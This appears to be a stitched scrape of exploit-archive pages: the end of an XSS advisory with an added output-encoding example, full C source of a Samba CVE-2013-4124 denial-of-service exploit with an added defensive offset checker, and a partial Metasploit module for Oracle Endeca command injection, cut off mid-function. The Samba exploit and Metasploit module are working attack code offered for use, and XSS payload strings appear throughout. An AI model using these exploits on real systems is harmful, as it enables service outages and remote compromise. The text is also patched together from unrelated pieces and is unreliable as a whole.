Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174

/scripts/jquery.fade.js
GET scripts/jquery.fade.js
Response
The same..

IV. CREDITS
-------------------------
This vulnerability has been discovered by Juan Carlos García (@secnight)
Special Thanks: Perseo V.

LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
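The mooSocial and FICOBank reports above show the same two reflection contexts: input landing inside a quoted tag attribute (the `' onmouseover=prompt(...) bad='` payload closes the quote and adds an event handler) and, in mooSocial, input landing inside a <script> string literal. The following is an added example, not code from either site, that pairs each vulnerable rendering with the output encoding that fixes that context and uses the standard-library HTML parser to show whether the injected handler actually became an attribute. The payload strings are the ones quoted in the two reports; the surrounding templates are constructed.

```python
"""Output encoding for the two reflection contexts in the mooSocial and FICOBank
reports, added here as an example (not code from either site). Each vulnerable
renderer is paired with the encoding for its context; attribute_names() parses
the result to show whether an injected handler became a real attribute.
Payloads are quoted from the reports; the templates are constructed.
"""
import html
import json
from html.parser import HTMLParser
from typing import List

ATTR_PAYLOAD_SQ = "sample@email.tst' onmouseover=prompt(947854) bad='"   # FICOBank contact form
ATTR_PAYLOAD_DQ = '" onmouseover=prompt(976681) bad="'                    # mooSocial source_id
SCRIPT_PAYLOAD = "'';!--'<XSS>=&{()}"                                      # mooSocial video_id


def attr_vulnerable(value: str, quote: str = "'") -> str:
    """Reflect straight into a quoted attribute, as both reports describe."""
    return (f"<input type={quote}text{quote} name={quote}email{quote} "
            f"value={quote}{value}{quote}>")


def attr_safe(value: str, quote: str = "'") -> str:
    """html.escape(quote=True) encodes both ' and ", so the attribute cannot be closed."""
    encoded = html.escape(value, quote=True)
    return (f"<input type={quote}text{quote} name={quote}email{quote} "
            f"value={quote}{encoded}{quote}>")


def script_vulnerable(value: str) -> str:
    """Reflect into a JS string literal between single quotes."""
    return f"<script>var video_id = '{value}';</script>"


def script_safe(value: str) -> str:
    """Emit a JSON string literal and escape the characters that can end the
    script element or start a comment, so the HTML parser never sees them."""
    literal = (json.dumps(value)
               .replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))
    return f"<script>var video_id = {literal};</script>"


class _FirstTag(HTMLParser):
    """Record the attribute names of the first start tag seen."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: List[str] = []
        self.seen = False

    def handle_starttag(self, tag, attrs) -> None:
        if not self.seen:
            self.seen = True
            self.attrs = [name for name, _ in attrs]


def attribute_names(markup: str) -> List[str]:
    """An injected 'onmouseover' appears here only if the quote was really broken."""
    parser = _FirstTag()
    parser.feed(markup)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    print(attribute_names(attr_vulnerable(ATTR_PAYLOAD_SQ)))   # [..., 'onmouseover', 'bad']
    print(attribute_names(attr_safe(ATTR_PAYLOAD_SQ)))         # ['type', 'name', 'value']
    print(script_safe(SCRIPT_PAYLOAD))
```

The script-context encoder deliberately does more than json.dumps: a bare `</script>` inside a JSON string is still a valid JSON string, but the HTML tokenizer ends the script element on it regardless of JavaScript quoting, which is why the angle brackets are turned into \u escapes as well.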
-
Description : Samba malformed nttrans smb packet remote denial of service exploit. This is the second version of this exploit that adds an automated offset and a second argument.
Author : x90c
Source : Samba nttrans Denial Of Service ≈ Packet Storm
Code :

/*
   !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!

   CVE-2013-4124 samba dos exploit

   ----
   [x90c@ubuntu samba_dos]$ ./samba_nttrans_exploit
                ___    ___
               / _ \  / _ \
    __ __     | (_) || | | |  ___
    \ \/ /     \__. || | | | / __|
     >  <       / /  | |_| || (__
    /_/\_\     /_/    \___/  \___|

   samba nttrans reply exploit

   Usage: ./samba_exploit [target ip addr] <server name>
   ex) ./samba_exploit 10.0.1.16
   ex) ./samba_exploit 10.0.1.16 MYSAMBA
   [x90c@ubuntu samba_dos]$
   ----

   * ... Description ...:

   I didn't test the exploit yet; I copied another samba nttrans exploit from
   2003, http://www.securiteam.com/exploits/5TP0M2AAKS.html.

   1) the vulnerable data offset is automated from 0xffffffff to 0xf1000000,
      and a second argument can be passed for the server name to make the nbt
      session. If you pass the target ip addr and server name to this exploit
      the samba will be dos'd! The exploit sends a malformed nttrans smb
      packet with a large value for the data offset and param offset.

   2) they are all of the offsets of the nttrans struct that cause the integer
      wrap in the vulnerable function read_nttrans_ea_list.

   It should work because of 1) and 2)

   - exploit process:
     (1) smb negotiations
     (2) malformed smb nttrans packet with an offset of 0xffffffff ~ 0xf1000000
         sent to cause the integer wrap!
     (3) ...... samba dos!

   I left an article that analyzed it

   !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!

   x90c
*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>

typedef unsigned char uint8;
typedef unsigned short uint16;
typedef unsigned int uint32;   /* was `unsigned long`; must be 4 bytes for the header memcpy()s below */

struct variable_data_header {
    uint8 wordcount, bytecount[2];
};

struct nbt_session_header {
    uint8 type, flags, len[2];
};

struct smb_base_header {
    uint8 protocol[4], command, errorclass, reserved, errorcode[2];
    uint8 flags;
    uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];
};

struct negprot_reply_header {
    uint8 wordcount;
    uint8 dialectindex[2];
    uint8 securitymode;
    uint16 maxmpxcount, maxvccount;
    uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;
    uint16 timezone;
    uint8 keylen;
    uint16 bytecount;
};

struct sesssetupx_request_header {
    uint8 wordcount, command, reserved;
    uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];
    uint8 sessionid[4];
    uint8 ipasswdlen[2], passwdlen[2];
    uint8 reserved2[4], capabilities[4];
};

struct sesssetupx_reply_header {
    uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];
};

struct tconx_request_header {
    uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];
};

struct tconx_reply_header {
    uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];
};

struct nttrans_request_header {
    uint8 wordcount;
    uint8 maxsetupcount;
    uint8 flags[2];
    uint8 totalparamcount[4];
    uint8 totaldatacount[4];
    uint8 maxparamcount[4];
    uint8 maxdatacount[4];
    uint8 paramcount[4];
    uint8 paramoffset[4];   // offset!
    uint8 datacount[4];
    uint8 dataoffset[4];    // XXX the data offset vulnerable!
    uint8 setupcount;       // nttrans struct doesn't have other offset
    uint8 function[2];      // field without them
    uint8 bytecount[2];
};

#define SMB_NEGPROT        0x72
#define SMB_SESSSETUPX     0x73
#define SMB_TCONX          0x75
#define SMB_TRANS2         0x32
#define SMB_NTTRANS        0xA0
#define SMB_NTTRANSCREATE  0x01
#define SMB_TRANS2OPEN     0x00
#define SMB_SESSIONREQ     0x81
#define SMB_SESSION        0x00

uint32 sessionid, PARAMBASE = 0x81c0000;
char *tconx_servername;
int tid, pid, uid;

#define STACKBOTTOM 0xbfffffff
#define STACKBASE   0xbfffd000
#define TOTALCOUNT  ((int)(STACKBOTTOM - STACKBASE))

/* first-level NetBIOS name encoding: each nibble becomes 'A' + nibble, 16 chars padded with spaces */
char *netbios_encode_name(char *name, int type)
{
    char plainname[16], c, *encoded, *ptr;
    int i, len = strlen(name);

    if ((encoded = malloc(34)) == NULL) {
        fprintf(stderr, "malloc() failed\n");
        exit(-1);
    }
    ptr = encoded;
    strncpy(plainname, name, 15);
    *ptr++ = 0x20;

    for (i = 0; i < 16; i++) {
        if (i == 15)
            c = type;
        else {
            if (i < len)
                c = toupper(plainname[i]);
            else
                c = 0x20;
        }
        *ptr++ = (((c >> 4) & 0xf) + 0x41);
        *ptr++ = ((c & 0xf) + 0x41);
    }
    *ptr = '\0';

    return encoded;
}

void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)
{
    struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;
    uint16 nlen;

    // no idea whether this is the right way, but it seems to work ..
    if (len > 65535)
        nlen = 65535;
    else
        nlen = htons(len);

    memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header));
    nbt_hdr->type = type;
    nbt_hdr->flags = flags;
    memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));
}

// the caller takes care of the correct value of ptr.
void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2,
                               uint16 tid, uint16 pid, uint16 uid, uint16 mid)
{
    struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;

    memset(base_hdr, '\0', sizeof (struct smb_base_header));
    memcpy(base_hdr->protocol, "\xffSMB", 4);
    base_hdr->command = command;
    base_hdr->flags = flags;
    memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));
    memcpy(&base_hdr->tid, &tid, sizeof (uint16));
    memcpy(&base_hdr->pid, &pid, sizeof (uint16));
    memcpy(&base_hdr->uid, &uid, sizeof (uint16));
    memcpy(base_hdr->mid, &mid, sizeof (uint16));
}

void construct_sesssetupx_header(char *ptr)
{
    struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;
    uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;
    uint32 capabilities = 0x50;

    memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header));
    sx_hdr->wordcount = 13;
    sx_hdr->command = 0xff;
    memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));
    memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));
    memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));
    memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));
    memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));
    memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));
    memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));
}

/*
struct tconx_request_header {
    uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];
    -- uint16 bytecount gives the length of the following fields:
    char password[], path[], service[];
};
*/

void construct_tconx_header(char *ptr)
{
    struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;
    uint16 passwdlen = 1, bytecount;
    char *data;

    memset(tx_hdr, '\0', sizeof (struct tconx_request_header));
    bytecount = strlen(tconx_servername) + 15;

    if ((data = malloc(bytecount)) == NULL) {
        fprintf(stderr, "malloc() failed, aborting!\n");
        exit(-1);
    }
    memcpy(data, "\x00\x5c\x5c", 3);
    memcpy(data + 3,
tconx_servername, strlen(tconx_servername)); memcpy(data + 3 + strlen(tconx_servername), "\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12); tx_hdr->wordcount = 4; tx_hdr->xcommand = 0xff; memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16)); memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16)); memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount); } void nbt_session_request(int fd, char *clientname, char *servername) { char *cn, *sn; char packet[sizeof (struct nbt_session_header) + (34 * 2)]; construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header)); tconx_servername = servername; sn = netbios_encode_name(servername, 0x20); cn = netbios_encode_name(clientname, 0x00); memcpy(packet + sizeof (struct nbt_session_header), sn, 34); memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34); write(fd, packet, sizeof (packet)); close(fd); free(cn); free(sn); } void process_nbt_session_reply(int fd) { struct nbt_session_header nbt_hdr; char *errormsg; uint8 errorcode; int size, len = 0; if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } if (size != sizeof (nbt_hdr)) { close(fd); fprintf(stderr, "read() a broken packet, aborting.\n"); exit(-1); } memcpy(&len, &nbt_hdr.len, sizeof (uint16)); if (len) { read(fd, (void *)&errorcode, 1); close(fd); switch (errorcode) { case 0x80 : errormsg = "Not listening on called name"; break; case 0x81 : errormsg = "Not listening for calling name"; break; case 0x82 : errormsg = "Called name not present"; break; case 0x83 : errormsg = "Called name present, but insufficient resources"; break; case 0x8f : errormsg = "Unspecified error"; break; default : errormsg = "Unspecified error (unknown error code received!)"; break; } fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg, errorcode); exit(-1); } printf("session request 
granted\n"); } void negprot_request(int fd) { struct variable_data_header data; char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS 1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \ "\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S KWAADWAAR"; char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)]; int dlen = htons(sizeof (dialects)); memset(&data, '\0', sizeof (data)); construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); pid = getpid(); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1); memcpy(&data.bytecount, &dlen, sizeof (uint16)); memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data)); memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), dialects, sizeof (dialects)); if (write(fd, packet, sizeof (packet)) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } } void process_negprot_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct negprot_reply_header *np_reply_hdr; char packet[1024]; int size; uint16 pid_reply; nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header))); if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16)); memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32)); if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != 
pid) { close(fd); fprintf(stderr, "protocol negotiation failed\n"); exit(-1); } printf("protocol negotiation complete\n"); } void sesssetupx_request(int fd) { uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61"; char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct sesssetupx_request_header) + sizeof (data)]; int size; construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1); construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct sesssetupx_request_header), &data, sizeof (data)); if ((size = write(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } if (size != sizeof (packet)) { close(fd); fprintf(stderr, "couldn't write entire packet, aborting!\n"); exit(-1); } } void process_sesssetupx_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct sesssetupx_reply_header *sx_hdr; char packet[1024]; int size, len; if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(&len, &nbt_hdr->len, sizeof (uint16)); memcpy(&uid, &base_hdr->uid, sizeof (uint16)); if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3) { close(fd); fprintf(stderr, "session setup failed\n"); exit(-1); } printf("session setup 
complete, got assigned uid %i\n", uid); } void tconx_request(int fd) { char *packet; int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15; if ((packet = malloc(pktsize)) == NULL) { close(fd); fprintf(stderr, "malloc() failed, aborting!\n"); exit(-1); } construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header)); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1); construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); if ((size = write(fd, packet, pktsize)) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } free(packet); if (size != pktsize) { close(fd); fprintf(stderr, "couldn't write entire packet, aborting!\n"); exit(-1); } } void process_tconx_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct tconx_reply_header *tx_hdr; char packet[1024]; int size, bytecount; if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(&tid, &base_hdr->tid, sizeof (uint16)); memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16)); printf("tree connect complete, got assigned tid %i\n", tid); } void nttrans_request(int fd, unsigned int offset_wrap) { // packet = nbt session header + smb base header + nttrans header! 
char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct nttrans_request_header)]; struct nttrans_request_header nttrans_hdr; // nttrans header! int size=0; int function = SMB_NTTRANSCREATE; // NTTRANSCREATE! int totalparamcount = TOTALCOUNT; int totaldatacount = 0; uint8 setupcount = 0; memset(&nttrans_hdr, 0, sizeof nttrans_hdr); // construct nbt session header construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); // construct smb base header construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1); // construct nttrans header sprintf(nttrans_hdr.paramoffset, "%p", offset_wrap); /********** * XXX data offset 0xffffffff to 0xf1000000 to integer wrap * the offset exploits the security bug of CVE-2013-4124 * samba remote dos! */ sprintf(nttrans_hdr.dataoffset, "%p", offset_wrap); nttrans_hdr.wordcount = 19 + setupcount; memcpy(&nttrans_hdr.function, &function, sizeof (uint16)); memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32)); memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32)); memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr); // send samba packet! size = write(fd, packet, sizeof (packet)); close(fd); } static char banner[]={ " ___ ___ \n" \ " / _ \\ / _ \\ \n" \ " __ __| (_) || | | | ___ \n" \ " \\ \\/ / \\__. 
|| | | | / __| \n" \ " > < / / | |_| || (__ \n" \ " /_/\\_\\ /_/ \\___/ \\___| \n" \ }; int main(int argc, char *argv[]) { int fd; struct sockaddr_in s_in; char target_ip[16]; char server_name[32]; int smb_port=139; unsigned int offset_wrap=0x00000000; printf("%s\n\nsamba nttrans reply exploit\n\n", banner); if(argc < 2){ fprintf(stderr, "samba nttrans reply exploit Usage:\n\n./samba_exploit [target ip addr] <server name>\n\n" "ex) ./samba_exploit 10.0.1.16\n" "ex) ./samba_exploit 10.0.1.16 MYSAMBA\n\n"); exit(-1); } strncpy(target_ip, argv[1], 16); if(argc==3){ memset(server_name, 0, sizeof server_name); strncpy(server_name, argv[2], sizeof(server_name)-1); } else{ sprintf(server_name, "SAMBA"); } printf("[*] SERVER NAME: %s\n", server_name); memset(&s_in, 0, sizeof (s_in)); s_in.sin_family = AF_INET; s_in.sin_port = htons(smb_port); // samba port=139/tcp s_in.sin_addr.s_addr = inet_addr(target_ip); fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)); // nbt(netbios over tcpip, nbtstat) session request nbt_session_request(fd, "BOSSA", server_name); // adjust computer names(clientname, servername) process_nbt_session_reply(fd); // protocol negotiation negprot_request(fd); process_negprot_reply(fd); // session setup sesssetupx_request(fd); // setup request process_sesssetupx_reply(fd); // setup reply // tree connection setup tconx_request(fd); process_tconx_reply(fd); // exploit! printf("[*] nttrans reply exploit!\n"); // 0xffffffff ~ 0xf100000000 to integer wrap for(offset_wrap=0xffffffff; offset_wrap >= 0xf1000000; --offset_wrap){ printf("[-] offset to wrap up: %p\n", offset_wrap); nttrans_request(fd, offset_wrap); } close(fd); return 0; }
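A defender-side companion to the post above, added here as an example and not part of the original post or of x90c's code: it parses the fixed part of an SMB1 NT_TRANSACT request and flags the oversized parameter/data offsets the description talks about, comparing each offset and count against the received length before adding them, so a value near 2^32 can never wrap the sum back into range. The field layout follows the struct in the post (Reserved in place of flags); the packet builder and both sample packets are constructed for the demonstration, and the check illustrates the general bounds-check idea rather than Samba's actual patch for CVE-2013-4124.

```python
import struct
from dataclasses import dataclass
from typing import List

# SMB1 layout as in the post's struct: a 32-byte SMB header, then WordCount,
# then 19 words of NT_TRANSACT fields. The 4-byte NBT session header is not
# included, so offsets are relative to the start of the SMB header.
SMB_HEADER_LEN = 32
SMB_COM_NT_TRANSACT = 0xA0
NTTRANS_WORDS_FMT = "<BHIIIIIIIIBH"          # 38 bytes = 19 words
NTTRANS_WORDS_LEN = struct.calcsize(NTTRANS_WORDS_FMT)
U32_MASK = 0xFFFFFFFF


@dataclass
class NtTransHeader:
    max_setup_count: int
    total_param_count: int
    total_data_count: int
    max_param_count: int
    max_data_count: int
    param_count: int
    param_offset: int
    data_count: int
    data_offset: int
    setup_count: int
    function: int


def parse_nttrans(smb: bytes) -> NtTransHeader:
    """Parse the fixed fields of an SMB_COM_NT_TRANSACT request."""
    if len(smb) < SMB_HEADER_LEN + 1 or smb[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    if smb[4] != SMB_COM_NT_TRANSACT:
        raise ValueError("not an NT_TRANSACT request")
    word_count = smb[SMB_HEADER_LEN]
    if word_count < 19:
        raise ValueError("WordCount %d too small for NT_TRANSACT" % word_count)
    start = SMB_HEADER_LEN + 1
    if len(smb) < start + NTTRANS_WORDS_LEN:
        raise ValueError("truncated NT_TRANSACT header")
    fields = struct.unpack(NTTRANS_WORDS_FMT, smb[start:start + NTTRANS_WORDS_LEN])
    # fields: MaxSetupCount, Reserved, TotalParameterCount, TotalDataCount,
    #         MaxParameterCount, MaxDataCount, ParameterCount, ParameterOffset,
    #         DataCount, DataOffset, SetupCount, Function
    return NtTransHeader(fields[0], *fields[2:])


def check_offsets(smb: bytes, hdr: NtTransHeader) -> List[str]:
    """Return the reasons a request is malformed; an empty list means sane.

    Each offset and count is compared with the received length *separately*,
    before any addition, so an offset like 0xffffffff cannot wrap the sum
    into an apparently valid range. The explicit wrap test only names the
    condition the exploit relies on.
    """
    n = len(smb)
    findings: List[str] = []
    for name, off, cnt, total in (
        ("param", hdr.param_offset, hdr.param_count, hdr.total_param_count),
        ("data", hdr.data_offset, hdr.data_count, hdr.total_data_count),
    ):
        if off > n:
            findings.append("%s_offset 0x%08x beyond packet length %d" % (name, off, n))
        elif cnt > n - off:
            findings.append("%s_count %d exceeds bytes left after offset" % (name, cnt))
        if (off + cnt) & U32_MASK < off:
            findings.append("%s_offset + %s_count wraps 32 bits" % (name, name))
        if cnt > total:
            findings.append("%s_count %d exceeds total_%s_count %d" % (name, cnt, name, total))
    return findings


def inspect_nttrans(smb: bytes) -> List[str]:
    return check_offsets(smb, parse_nttrans(smb))


def build_nttrans(param_offset: int, data_offset: int, param_count: int = 0,
                  data_count: int = 0, total_param_count: int = 0,
                  total_data_count: int = 0) -> bytes:
    """Constructed sample: a minimal NT_TRANSACT request with the given fields."""
    header = b"\xffSMB" + bytes([SMB_COM_NT_TRANSACT]) + b"\x00" * (SMB_HEADER_LEN - 5)
    words = struct.pack(NTTRANS_WORDS_FMT, 0, 0, total_param_count, total_data_count,
                        0, 0, param_count, param_offset, data_count, data_offset, 0, 1)
    return header + bytes([19]) + words + struct.pack("<H", 0)   # ByteCount = 0


if __name__ == "__main__":
    sane = build_nttrans(param_offset=73, data_offset=73)        # offsets == packet end
    print("sane:", inspect_nttrans(sane))
    malformed = build_nttrans(param_offset=0xFFFFFFFF, data_offset=0xFFFFFFFF, data_count=0x10)
    for finding in inspect_nttrans(malformed):
        print("malformed:", finding)
```

The point of the ordering in check_offsets is that a receiver which computes `offset + count` first and only then compares with the length is exactly what a wrapped 32-bit sum defeats; comparing `offset` alone first makes the later subtraction `n - off` safe.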
-
Description : This Metasploit module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This Metasploit module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).
Author : rgod, juan vazquez
Source : Oracle Endeca Server Remote Command Execution ≈ Packet Storm
Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Powershell

    def initialize
        super(
            'Name'           => 'Oracle Endeca Server Remote Command Execution',
            'Description'    => %q{
                This module exploits a command injection vulnerability on the Oracle Endeca Server
                7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding
                web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on
                the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific.
                This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2
                (64 bits).
            },
            'Author'         =>
                [
                    'rgod <rgod[at]autistici.org>', # Vulnerability discovery
                    'juan vazquez' # Metasploit module
                ],
            'Platform'       => 'win',
            'Arch'           => [ ARCH_X86_64, ARCH_X86 ],
            'References'     =>
                [
                    [ 'CVE', '2013-3763' ],
                    [ 'BID', '61217' ],
                    [ 'OSVDB', '95269' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-190/' ],
                    [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html' ]
                ],
            'Targets'        =>
                [
                    [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
                ],
            'DefaultTarget'  => 0,
            'Privileged'     => false,
            'DisclosureDate' => 'Jul 16 2013'
        )

        register_options(
            [
                Opt::RPORT(7770),
                OptString.new('TARGETURI', [true, 'The URI path of the Control Web Service', '/ws/control'])
            ], self.class)
    end

    def peer
        return "#{rhost}:#{rport}"
    end

    def version_soap
        soap = <<-eos
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
    <soapenv:Header/>
    <soapenv:Body>
        <ns:version/>
    </soapenv:Body>
</soapenv:Envelope>
        eos
        return soap
    end

    def create_data_store_soap(name, files)
        soap = <<-eos
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
    <soapenv:Header/>
    <soapenv:Body>
        <ns:createDataStore>
            <ns:dataStoreConfig>
                <ns:name>#{name}</ns:name>
                <ns:dataFiles>#{files}</ns:dataFiles>
            </ns:dataStoreConfig>
        </ns:createDataStore>
    </soapenv:Body>
</soapenv:Envelope>
        eos
        return soap
    end

    def check
        res = send_request_soap(version_soap)

        if res.nil? or res.code != 200 or res.body !~ /versionResponse/
            return Exploit::CheckCode::Safe
        end

        version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /)
        if version_match.nil?
            return Exploit::CheckCode::Unknown
        else
            version = version_match[1]
        end

        print_status("#{peer} - Version found: Oracle Endeca Server #{version}")

        if version =~ /7\.4\.0/ and version <= "7.4.0.787"
            return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
    end

    def send_request_soap(data)
        res = send_request_cgi({
            'uri'     => normalize_uri(target_uri.path),
            'method'  => 'POST',
            'ctype'   => 'text/xml; charset=utf-8',
            'headers' => {
                'SOAPAction' => "\"\""
            },
            'data'    => data
        })

        return res
    end

    def exploit
        command = cmd_psh_payload(payload.encoded)
        if command.length > 8000 # Windows 2008 Command Prompt Max Length is 8191
            fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command")
        end
        print_status("#{peer} - Exploiting through Powershell...")
        execute_command(command)
    end

    def execute_command(cmd)
        # HTML encode ampersands so SOAP is correctly interpreted
        cmd.gsub!(/&/, "&")
